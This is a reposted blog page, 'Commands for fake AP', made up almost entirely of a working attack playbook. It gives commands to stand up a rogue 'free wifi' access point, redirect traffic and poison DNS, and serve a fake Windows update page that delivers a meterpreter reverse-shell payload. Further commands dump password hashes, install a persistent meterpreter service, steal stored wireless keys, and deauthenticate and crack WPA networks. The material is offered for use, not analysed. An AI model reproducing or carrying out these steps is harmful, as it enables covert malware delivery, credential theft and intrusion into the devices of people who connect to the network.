Bitcoin News Update: Commands for fake AP

Commands for fake AP
dhclient wlan0            //// Connect to the internet, can be eth0

*****Setup metasploit listener*********        ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places https://ift.tt/2ja8bNN
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit

modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v   ////// can use various commands here

*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1                         ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE         wlan0 = route to the internet
/etc/init.d/dhcp3-server restart                                                      // backtrack users use dhcpd
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'                                           //webserver with fake update page

**********************************************************************
direct any request to apache
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1               //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************

NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v

su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'

cd /                                                                       /// dnspoison available at https://ift.tt/2mCrsaA
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1

****************************************************************************

**** Check for victims ********
arp -n -v -i at0

session - l
session -i
sysinfo
getuid
use priv
hashdump

***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4                            ///wireless key viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4                            /// executes bat script... check below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4                 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4                        //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt

misc......

wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service

Index html -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://ift.tt/kkyg93">
<html xmlns="https://ift.tt/lH0Osb">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">

</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>

<body>
<p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">

</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>

####################

ifconfig rausb0 up
airodump-ng -w capture -c 6 rausb0

aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack

aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request

aircrack capture02.cap

##################
aircrack-ng -a 2 filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note.You must capture full cap files with airodump-ng (which means without --ivs option), not just IVs

------------------
Have you tried to manually connect to your AP?

iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 key <whatever the key is> (if you have WEP turned on)
ifconfig eth0 up

Try that, give it a minute or 2 and then run iwconfig again and post your results.
##################

from BITCOIN NEWS https://ift.tt/2LzPkVO
via Bitcoin News Update

Bitcoin News Update

Monday, May 28, 2018

Commands for fake AP

Share this

Related Articles :

Paling Dilihat